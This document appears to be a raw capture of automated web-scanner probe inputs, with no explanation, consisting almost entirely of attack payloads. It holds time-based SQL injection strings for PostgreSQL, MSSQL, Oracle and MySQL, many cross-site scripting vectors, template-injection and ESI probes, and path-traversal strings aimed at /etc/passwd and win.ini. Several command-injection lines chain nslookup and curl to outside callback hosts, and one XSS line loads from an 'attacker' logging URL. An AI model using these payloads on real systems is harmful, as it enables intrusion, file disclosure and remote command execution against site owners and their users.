1VByuu6EA') OR 798=(SELECT 798 FROM PG_SLEEP(15))--

1MQ8o6Rn0' OR 818=(SELECT 818 FROM PG_SLEEP(15))--

1-1)) OR 113=(SELECT 113 FROM PG_SLEEP(15))--

1-1) OR 469=(SELECT 469 FROM PG_SLEEP(15))--

1-1 OR 667=(SELECT 667 FROM PG_SLEEP(15))--

1lPBlcoQu')); waitfor delay '0:0:15' --

1Tm0fmX47'); waitfor delay '0:0:15' --

19u97QGfN'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+175-175) --

-1" OR 3*2<(0+5+175-175) --

-1" OR 3+175-175-1=0+0+0+1 --

-1" OR 2+175-175-1=0+0+0+1 --

-1' OR 3*2>(0+5+954-954) or 'aRz9d7aC'='

-1' OR 3*2<(0+5+954-954) or 'aRz9d7aC'='

-1' OR 3+954-954-1=0+0+0+1 or 'aRz9d7aC'='

-1' OR 2+954-954-1=0+0+0+1 or 'aRz9d7aC'='

-1' OR 3*2>(0+5+723-723) --

-1' OR 3*2<(0+5+723-723) --

-1' OR 3+723-723-1=0+0+0+1 --

-1' OR 2+723-723-1=0+0+0+1 --

-1 OR 3*2>(0+5+571-571)

-1 OR 3*2<(0+5+571-571)

-1 OR 3+571-571-1=0+0+0+1

-1 OR 2+571-571-1=0+0+0+1

-1 OR 3*2>(0+5+806-806) --

-1 OR 3*2<(0+5+806-806) --

-1 OR 3+806-806-1=0+0+0+1 --

-1 OR 2+806-806-1=0+0+0+1 --

1

1

Mr.

555

1<aO2Q5on<

1<img sRc='http://attacker-9620/log.php?

1<aOXyFKr x=9456>

1<ifRAme sRc=9961.com></IfRamE>

1<W2MJ4T>41TWI[!+!]</W2MJ4T>

11ASaN

<InvalidTag >Zbps(9907)</ScRiPt>

1}body{zzz:Expre/**/SSion(Zbps(9354))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=Zbps(9552)>

�<img zzz onmouseover=Zbps(90461) //�>

1&lt;ScRiPt&gt;Zbps(9403)&lt;/sCripT&gt;

1\u003CScRiPt\Zbps(9124)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%5A%62%70%73%289593%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9395)>

1<img src=xyz OnErRor=Zbps(9788)>

1<img src=//xss.bxss.me/t/dot.gif onload=Zbps(9492)>

1<body onload=Zbps(9614)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9445'>

1<isindex type=image src=1 onerror=Zbps(9944)>

1<svg

� onload=Zbps(9888);>

1<InvalidTag

>Zbps(9165)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9971></ScRiPt>

1<InvalidTag

>Zbps(9847)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%62%70%73%28%39%39%39%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

@@5HVxu

1<InvalidTag>Zbps(9750)</script>9750

����%2527%2522\'\"

1<InvalidTag>Zbps(9091)</script>

'"

1<WX9YQF>STVT1[!+!]</WX9YQF>

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1<InvalidTag >Zbps(9827)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

bfgx4760%C0%BEz1%C0%BCz2a%90bcxhjl4760

bfg6665%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6665

19387457

'"()&%<zzz><InvalidTag >Zbps(9398)</ScRiPt>

1'"()&%<zzz><InvalidTag >Zbps(9511)</ScRiPt>

1<arWL61H<

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1<img sRc='http://attacker-9657/log.php?

1<arqdF97 x=9058>

1<ifRAme sRc=9767.com></IfRamE>

1<WB931P>0ENQU[!+!]</WB931P>

1zzddS

1}body{zzz:Expre/**/SSion(Zbps(9642))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=Zbps(9236)>

�<img zzz onmouseover=Zbps(90171) //�>

1&lt;ScRiPt&gt;Zbps(9234)&lt;/sCripT&gt;

1\u003CScRiPt\Zbps(9734)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%5A%62%70%73%289315%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9180)>

1<img src=xyz OnErRor=Zbps(9251)>

1<img src=//xss.bxss.me/t/dot.gif onload=Zbps(9718)>

1<body onload=Zbps(9794)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9577'>

1<isindex type=image src=1 onerror=Zbps(9439)>

1YmjmJ0Uo')) OR 935=(SELECT 935 FROM PG_SLEEP(15))--

1<svg

1<InvalidTag

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9536></ScRiPt>

1<InvalidTag

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%62%70%73%28%39%30%34%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>Zbps(9115)</script>9115

1<InvalidTag>Zbps(9621)</script>

1<WVPZJ7>Y5IRU[!+!]</WVPZJ7>

1<InvalidTag >Zbps(9307)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

1MKDrFvPX') OR 964=(SELECT 964 FROM PG_SLEEP(15))--

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx9596%C0%BEz1%C0%BCz2a%90bcxhjl9596

bfg10959%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10959

19777082

'"()&%<zzz><InvalidTag >Zbps(9557)</ScRiPt>

1'"()&%<zzz><InvalidTag >Zbps(9943)</ScRiPt>

1Q7YXeaJc' OR 269=(SELECT 269 FROM PG_SLEEP(15))--

<!--

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

xfs.bxss.me?hkbakels.com.hk

http://xfs.bxss.me?hkbakels.com.hk

'"

914428

xfs.bxss.me

<!--

'"

1-1)) OR 200=(SELECT 200 FROM PG_SLEEP(15))--

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

xfs.bxss.me?hkbakels.com.hk

'+'A'.concat(70-3).concat(22*4).concat(110).concat(68).concat(97).concat(76)+(require'socket'

Socket.gethostbyname('hitre'+'wxprmyyab70f1.bxss.me.')[3].to_s)+'

http://xfs.bxss.me?hkbakels.com.hk

"+"A".concat(70-3).concat(22*4).concat(116).concat(77).concat(122).concat(77)+(require"socket"

Socket.gethostbyname("hitii"+"whnqxnxf36b44.bxss.me.")[3].to_s)+"

941193

xfs.bxss.me

1-1) OR 579=(SELECT 579 FROM PG_SLEEP(15))--

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'+'A'.concat(70-3).concat(22*4).concat(119).concat(88).concat(118).concat(73)+(require'socket'

"+"A".concat(70-3).concat(22*4).concat(112).concat(86).concat(120).concat(68)+(require"socket"

1-1 OR 197=(SELECT 197 FROM PG_SLEEP(15))--

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1T0wNqcpt')); waitfor delay '0:0:15' --

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

bxss.me

c:/windows/win.ini

/etc/shells

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1wjVdTELa'); waitfor delay '0:0:15' --

"+response.write(9413908*9422846)+"

'+response.write(9413908*9422846)+'

response.write(9413908*9422846)

19IUACRAh'; waitfor delay '0:0:15' --

"+response.write(9593238*9273440)+"

'+response.write(9593238*9273440)+'

bxss.me

c:/windows/win.ini

/etc/shells

response.write(9593238*9273440)

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1-1 waitfor delay '0:0:15' --

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

${9999134+9999518}

${9999014+9999167}

<esi:include src="http://bxss.me/rpb.png"/>

1-1)); waitfor delay '0:0:15' --

<esi:include src="http://bxss.me/rpb.png"/>

1-1); waitfor delay '0:0:15' --

WEB-INF\web.xml

WEB-INF/web.xml

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

/../../../../../../../../../../boot.ini

1-1; waitfor delay '0:0:15' --

../../../../../../../../../../windows/win.ini%00.jpg

C:\WINDOWS\system32\drivers\etc\hosts

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

;(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)|(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)&(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)

`(nslookup -q=cname hitaivbjzxvsidc455.bxss.me||curl hitaivbjzxvsidc455.bxss.me)`

|(nslookup -q=cname hitpqniwyknuc1c805.bxss.me||curl hitpqniwyknuc1c805.bxss.me)

&(nslookup -q=cname hitjctvtbxree43260.bxss.me||curl hitjctvtbxree43260.bxss.me)&'\"`0&(nslookup -q=cname hitjctvtbxree43260.bxss.me||curl hitjctvtbxree43260.bxss.me)&`'

&nslookup -q=cname hithjtmqmclwoc076a.bxss.me&'\"`0&nslookup -q=cname hithjtmqmclwoc076a.bxss.me&`'

$(nslookup -q=cname hitrsendnydfd9e9cb.bxss.me||curl hitrsendnydfd9e9cb.bxss.me)

WEB-INF\web.xml

(nslookup -q=cname hitaiqgljcczs7f6e8.bxss.me||curl hitaiqgljcczs7f6e8.bxss.me))

WEB-INF/web.xml

|echo ogmstl$()\ nlkjdq\nz^xyu||a #' |echo ogmstl$()\ nlkjdq\nz^xyu||a #|" |echo ogmstl$()\ nlkjdq\nz^xyu||a #

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

&echo voezyd$()\ msubnc\nz^xyu||a #' &echo voezyd$()\ msubnc\nz^xyu||a #|" &echo voezyd$()\ msubnc\nz^xyu||a #

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

echo lcspua$()\ cueipo\nz^xyu||a #' &echo lcspua$()\ cueipo\nz^xyu||a #|" &echo lcspua$()\ cueipo\nz^xyu||a #

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

/../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini%00.jpg

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

C:\WINDOWS\system32\drivers\etc\hosts

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

